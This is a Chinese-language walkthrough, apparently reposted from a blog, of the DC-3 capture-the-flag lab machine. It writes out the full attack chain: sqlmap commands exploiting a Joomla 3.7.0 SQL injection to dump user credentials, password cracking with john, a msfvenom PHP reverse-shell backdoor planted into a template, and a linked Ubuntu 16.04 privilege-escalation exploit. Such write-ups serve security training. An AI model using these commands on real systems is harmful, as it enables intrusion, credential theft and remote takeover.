DC-3靶机WalkThrough

Posted zhaoritian12138

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DC-3靶机WalkThrough相关的知识,希望对你有一定的参考价值。

DC 3 :WalkThrough

技术图片



信息收集

主机发现

使用nmap进行扫描,对结果进行过滤,只打印目标主机

nmap --system-dns -sP 10.0.0.1/24 | grep 10.0.0. | egrep -v 10.0.0.1 | egrep -v 10.0.0.26 | awk ‘{printf $5}‘ > target.txt && cat target.txt

技术图片

端口扫描

对目标进行全面探测,发现目标使用joomla cms,内核版本为3.2 - 4.9

nmap -T4 -A --system-dns -iL target.txt

技术图片

访问80端口

主页面告知该靶机只有一个flag,需要提权获得。没发现robots.txt。使用kali中内置joomla扫描器,使用它看看能否有进一步发现

技术图片

joomscan扫描

joomscan帮助文档非常简单,只需要指定扫描URL即可。使用joomscan发现了joomla版本和后台登陆页面。

joomscan --url http://10.0.0.33

技术图片

漏洞发掘

joomla3.7.0 SQL注入漏洞

使用earchsploit和msf搜索joomla 3.7版本漏洞,在没有办法的时候才使用暴力破解尝试登陆后台网站。通过搜索发现许多可用漏洞,这里使用其中一个进行利用

技术图片

查看42033.txt的描述

技术图片

Ubuntu 16.04本地提权漏洞

查找Ubuntu16.04漏洞

searchsploit ubuntu 16.04

技术图片

漏洞利用

获取后台帐号密码

根据42003.txt的描述,使用文件中的sql语句,获取数据库

sqlmap -u "http://10.0.0.33/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

技术图片

获取数据表

sqlmap -u "http://10.0.0.33/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

技术图片

获取字段,这里需要爆破列名

sqlmap -u "http://10.0.0.33/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

技术图片

获取账号密码

sqlmap -u "http://10.0.0.33/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "id,username,password,name" --dump -p list[fullordering]

技术图片

暴力破解密码hash值

保存得到的hash值,使用john进行暴力破解

技术图片

使用帐号密码登陆后台

技术图片

反弹shell

在上传phpshell之前,先使用msfvenom生成php反弹后门

msfvenom  -p php/meterpreter/reverse_tcp -a php lhost=10.0.0.26 -o rev.php -e php/base64 -i 5

技术图片

在Extensions ->Templates -> Templates -> Beez3 Details and Files里面可以修改默认的php页面,将生成的后门代码替换默认php页面

技术图片

访问该文件,开启msf,获取目标shell

技术图片

技术图片

提权

在漏洞发掘阶段,我们找到了大量的漏洞可以利用,经过测试,c语言文件都不能用。这里选择39772.txt。国外无法访问,这里使用的是国内的资源。

https://gitee.com/aaaddc/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip

技术图片

解压执行。这里要说明一点,压缩包里面的资源已经提前被我解压出来又放回压缩包里面了

技术图片

flag

获取到root权限之后,查看root目录,得到flag

技术图片

总结

nmap结果过滤

使用nmap扫描存活主机时,过滤结果并输出到文件,并查看文件

nmap --system-dns -sP 10.0.0.1/24 | grep 10.0.0. | egrep -v 10.0.0.1 | egrep -v 10.0.0.26 | awk ‘{print $5}‘ > target.txt && cat target.txt

msfvenom生成后门

msfvenom生成php后门

msfvenom -p php/meterpreter/reverse_tcp -a php lhost=10.0.0.26 -e php/base64 -i 5 -o backdoor.php

Ubuntu 16.04提权

Ubuntu 16.04本地提权poc,39772.zip
Gitee上的资源

john the ripper破解密码

john破解hash值,文件中帐号与密码使用“冒号”分隔

john db.hash --show

以上是关于DC-3靶机WalkThrough的主要内容,如果未能解决你的问题,请参考以下文章

DC-5靶机WalkThrough

DC-5靶机WalkThrough

DC-1靶机Walkthrough

DC-1靶机Walkthrough

Vulnhub Bravery靶机 Walkthrough

DC-3靶机